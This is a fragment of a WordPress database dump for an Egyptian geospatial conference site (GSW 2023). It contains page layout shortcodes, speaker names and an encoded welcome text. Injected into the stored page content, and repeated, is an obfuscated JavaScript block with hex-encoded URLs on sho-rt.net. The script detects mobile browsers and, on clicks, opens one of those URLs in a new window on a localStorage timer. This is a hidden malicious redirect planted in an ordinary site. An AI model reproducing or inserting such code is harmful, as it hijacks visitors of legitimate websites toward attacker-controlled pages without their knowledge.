bs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 21:52:48','2022-10-06 21:52:48','',2167,'https://gsw2023.com/?p=2344',0,'revision','',0),
(2345,1,'2022-10-06 22:01:03','2022-10-06 22:01:03','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 